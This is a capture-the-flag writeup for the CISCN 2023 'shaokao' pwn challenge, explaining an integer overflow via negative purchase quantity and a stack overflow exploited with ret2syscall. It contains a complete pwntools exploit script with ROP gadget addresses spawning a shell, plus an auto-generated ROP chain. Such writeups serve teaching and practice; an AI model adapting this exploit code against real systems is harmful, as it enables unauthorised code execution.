
[CISCN 2023 Qualifiers] 烧烤摊儿 (shaokao): writeup by RedLeaves

2023-06-27 16:10 By Decline
Tags: stack overflow, integer overflow, ret2syscall, PWN

The purchase logic has a negative-number integer overflow: enter any negative quantity, as long as the resulting balance is enough to take over the stall.
Once the stall has been taken over, option 5 (rename) becomes available.
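As an added illustration (not the challenge's source, which this writeup does not reproduce), here is the arithmetic pattern behind that negative-quantity bug next to a checked version; the function names, the stall price and the balance values are assumed:

```c
/* Added example, not the shaokao binary's code: reconstruction of the
 * "buy with a negative quantity" overflow and a hardened replacement.
 * STALL_PRICE and the function names are assumptions. */
#include <stdint.h>
#include <stdbool.h>

#define STALL_PRICE 100000LL   /* assumed cost of taking over the stall */

/* Vulnerable pattern: the quantity is signed and never range-checked, so a
 * negative count makes price * count negative and the subtraction ADDS money. */
int64_t buy_unchecked(int64_t money, int64_t price, int64_t count) {
    return money - price * count;
}

/* Hardened version: reject non-positive inputs, refuse when price * count
 * would overflow, and refuse when the cost exceeds the balance.
 * On any rejection *money is left untouched and false is returned. */
bool buy_checked(int64_t *money, int64_t price, int64_t count) {
    if (count <= 0 || price <= 0)
        return false;
    if (count > INT64_MAX / price)   /* multiplication would overflow */
        return false;
    int64_t cost = price * count;
    if (cost > *money)               /* cannot afford it */
        return false;
    *money -= cost;
    return true;
}

/* Can the player afford the stall after one purchase with the given inputs? */
bool can_take_over_after(int64_t money, int64_t price, int64_t count, bool hardened) {
    if (hardened)
        buy_checked(&money, price, count);   /* rejected purchases change nothing */
    else
        money = buy_unchecked(money, price, count);
    return money >= STALL_PRICE;
}
```

With the unchecked version, a balance of 100 and the writeup's quantity of -99999 at price 10 jumps to 1000090, which is why a single bogus purchase is enough to buy the stall.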
The rename function has a stack overflow. Although Canary is enabled, the slot at rbp - 0x08 is never checked; as I understand it, this shows up as the absence of a readfsqword call.
After that it is classic ret2syscall, which is actually quite simple. There are two approaches:

1. Build the ROP chain by hand

rdi = 0x40264F
rsi = 0x40A67E
rax = 0x458827
syscall = 0x402404
binsh = 0x04E60F0
rdx = 0x4A404B

Define all the registers needed, plus the address of the /bin/sh\x00 string, and build the ROP chain.
Note that with this method the padding must be b'A' * 0x20 rather than b'A' * (0x20 + 0x08):
the /bin/sh\x00 string (8 bytes) already fills those 0x08 bytes of padding.

Payload = b'/bin/sh\x00' + Padding + p64(rax) + p64(59) + p64(rdi) + p64(binsh) + p64(rsi) + p64(0) + p64(rdx) + p64(0) + p64(0) + p64(syscall)

name is a global variable, so its address is fixed.
Using that, we can get a shell with a single payload.

2. Build the ROP chain automatically with ROPGadget
Since this binary is statically linked, ROPGadget can build the chain directly with the following command:
ROPGadget --binary shaokao --ropchain

Copy out the last section of its output, tweak it slightly, and combine it with the padding to get a shell.

from pwn import *  # the original imported the author's PwnModules wrapper, which re-exports pwntools

io = process('./shaokao')
# io = remote('node2.anna.nssctf.cn', 28778)
elf = ELF('./shaokao')
# libc = ELF('/home/kaguya/PwnTool/glibc-all-in-one/libs/2.31-0ubuntu9.9_amd64/libc-2.31.so')
context(arch='amd64', os='linux', log_level='debug')


def choice(idx):
    io.recvuntil(b'> ')
    io.sendline(str(idx).encode())


# Menu interaction: option 1 with a negative quantity triggers the integer
# overflow, the next choices take over the stall, and option 5 opens rename.
choice(1)
io.sendline(b'1')
io.sendline(b'-99999')
io.sendline(b'3')
io.sendline(b'4')
io.sendline(b'5')

Padding = b'A' * 0x20   # 0x20, not 0x20 + 0x08: '/bin/sh\x00' supplies the other 8 bytes

rdi = 0x40264F        # pop rdi ; ret
rsi = 0x40A67E        # pop rsi ; ret
rax = 0x458827        # pop rax ; ret
syscall = 0x402404    # syscall
data = 0x04E60F0      # fixed address of the global name buffer, where '/bin/sh\x00' lands
rdx = 0x4A404B        # pop rdx ; pop rbx ; ret (hence the two zeros below)

# execve("/bin/sh", 0, 0): rax = 59, rdi = &"/bin/sh", rsi = 0, rdx = 0
Payload = b'/bin/sh\x00' + Padding
Payload += p64(rax) + p64(59)
Payload += p64(rdi) + p64(data)
Payload += p64(rsi) + p64(0)
Payload += p64(rdx) + p64(0) + p64(0)
Payload += p64(syscall)

# Alternative: the chain emitted by `ROPGadget --binary shaokao --ropchain`,
# which writes "/bin//sh" into .data itself (kept commented out).
# from struct import pack
# p = b''
# p += pack('<Q', 0x000000000040a67e)  # pop rsi ; ret
# p += pack('<Q', 0x00000000004e60e0)  # @ .data
# p += pack('<Q', 0x0000000000458827)  # pop rax ; ret
# p += b'/bin//sh'
# p += pack('<Q', 0x000000000045af95)  # mov qword ptr [rsi], rax ; ret
# p += pack('<Q', 0x000000000040a67e)  # pop rsi ; ret
# p += pack('<Q', 0x00000000004e60e8)  # @ .data + 8
# p += pack('<Q', 0x0000000000447339)  # xor rax, rax ; ret
# p += pack('<Q', 0x000000000045af95)  # mov qword ptr [rsi], rax ; ret
# p += pack('<Q', 0x000000000040264f)  # pop rdi ; ret
# p += pack('<Q', 0x00000000004e60e0)  # @ .data
# p += pack('<Q', 0x000000000040a67e)  # pop rsi ; ret
# p += pack('<Q', 0x00000000004e60e8)  # @ .data + 8
# p += pack('<Q', 0x00000000004a404b)  # pop rdx ; pop rbx ; ret
# p += pack('<Q', 0x00000000004e60e8)  # @ .data + 8
# p += pack('<Q', 0x4141414141414141)  # padding
# p += pack('<Q', 0x0000000000447339)  # xor rax, rax ; ret
# p += pack('<Q', 0x0000000000496710) * 59  # add rax, 1 ; ret, repeated 59 times -> rax = 59 (execve)
# p += pack('<Q', 0x0000000000402404)  # syscall
# io.sendline(b'A' * (0x20 + 0x08) + p)

io.sendline(Payload)
io.interactive()
© Copyright belongs to the author

Comments

I'd like to ask how many bytes /bin/sh\x00 is and how that is calculated.